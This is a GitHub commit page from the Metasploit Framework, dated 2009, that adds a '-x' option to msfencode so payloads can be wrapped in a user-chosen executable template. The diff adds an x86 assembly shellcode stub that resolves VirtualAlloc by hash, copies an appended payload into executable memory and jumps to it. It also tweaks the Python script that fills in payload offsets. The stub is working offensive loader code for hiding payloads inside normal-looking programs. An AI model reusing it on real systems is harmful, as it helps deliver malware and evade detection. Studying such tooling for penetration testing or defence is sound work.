Permalink
Browse files

This patch implements a much more flexible executable creation scheme…

… at the cost of exe size. This also adds the "-x" option to msfencode, allowing the user to specify their own executable template for generation.

git-svn-id: file:///home/svn/framework3/trunk@7315 4d416f70-5f16-0410-b530-b9f4589650da
  • Loading branch information...
1 parent 2c15be2 commit 21e82d8b69156aa5b69ce9072d0543f516ee5862 HD Moore committed Nov 1, 2009
View
Binary file not shown.
@@ -61,6 +61,7 @@ def xmit( name, dump_ruby=True ):
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
+ xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) ) # Filler
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
@@ -95,4 +96,4 @@ def main( argv=None ):
#=============================================================================#
if __name__ == "__main__":
main()
-#=============================================================================#
+#=============================================================================#
@@ -0,0 +1,52 @@
+;-----------------------------------------------------------------------------;
+; Author: (mostly) Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (31 October 2009)
+; Size:
+; Build: >build.py wrapped_jmp
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm" ;
+start: ;
+ pop ebp ; Pop off the address of 'api_call' for calling later.
+
+allocate_size:
+ mov esi,0x12345678
+
+allocate:
+ push byte 0x40 ; PAGE_EXECUTE_READWRITE
+ push 0x1000 ; MEM_COMMIT
+ push esi ; Push the length value of the wrapped code block
+ push byte 0 ; NULL as we dont care where the allocation is.
+ push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
+ call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+ mov ebx, eax ; Store allocated address in ebx
+ mov edi, eax ; Prepare EDI with the new address
+ mov ecx, esi ; Prepare ECX with the length of the code
+ call get_payload
+got_payload:
+ pop esi ; Prepare ESI with the source to copy
+ rep movsb ; Copy the payload to RWX memory
+ call set_handler ; Configure error handling
+
+exitblock:
+%include "./src/block/block_exitfunk.asm"
+set_handler:
+ xor eax,eax
+ push dword [fs:eax]
+ mov dword [fs:eax], esp
+ call ebx
+ jmp short exitblock
+
+get_payload:
+ call got_payload
+payload:
+; Append an arbitary payload here
+
Oops, something went wrong.

0 comments on commit 21e82d8

Please sign in to comment.